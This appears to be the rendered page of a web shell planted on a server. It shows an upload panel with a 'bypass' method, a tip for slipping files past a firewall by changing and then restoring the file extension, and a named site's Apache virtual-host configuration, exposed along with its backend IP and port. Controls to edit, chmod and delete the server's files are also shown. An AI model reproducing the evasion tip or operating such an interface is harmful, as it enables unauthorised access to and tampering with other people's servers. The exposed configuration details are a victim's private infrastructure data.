Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
etc
apache2
sites-enabled
File Content:
DMGMultiEventApiHandler.bitkit.dk.conf
<VirtualHost *:80> ServerName DMGMultiEventApiHandler.bitkit.dk ServerAlias www.DMGMultiEventApiHandler.bitkit.dk DocumentRoot /var/www/DMGMultiEventApiHandler.bitkit.dk/httpdocs <Directory /var/www/DMGMultiEventApiHandler.bitkit.dk/httpdocs> Options Indexes FollowSymLinks MultiViews AllowOverride ALL Order allow,deny allow from all </Directory> <IfModule mpm_itk_module> AssignUserId w-DMGMultiEventApiHandler w-DMGMultiEventApiHandler </IfModule> ProxyPreserveHost On SetEnv proxy-nokeepalive 1 SetEnv proxy-initial-not-pooled 1 ProxyPass / http://65.109.239.45:3014/ retry=1 acquire=3000 timeout=600 Keepalive=On ProxyPassReverse / http://65.109.239.45:3014/ timeout=600 RewriteEngine on RewriteCond %{SERVER_NAME} =dmgmultieventapihandler.bitkit.dk [OR] RewriteCond %{SERVER_NAME} =www.DMGMultiEventApiHandler.bitkit.dk [OR] RewriteCond %{SERVER_NAME} =DMGMultiEventApiHandler.bitkit.dk RewriteRule ^ https://%{SERVER_NAME}%{REQUEST_URI} [END,NE,R=permanent] </VirtualHost>
Edit
Download
Unzip
Chmod
Delete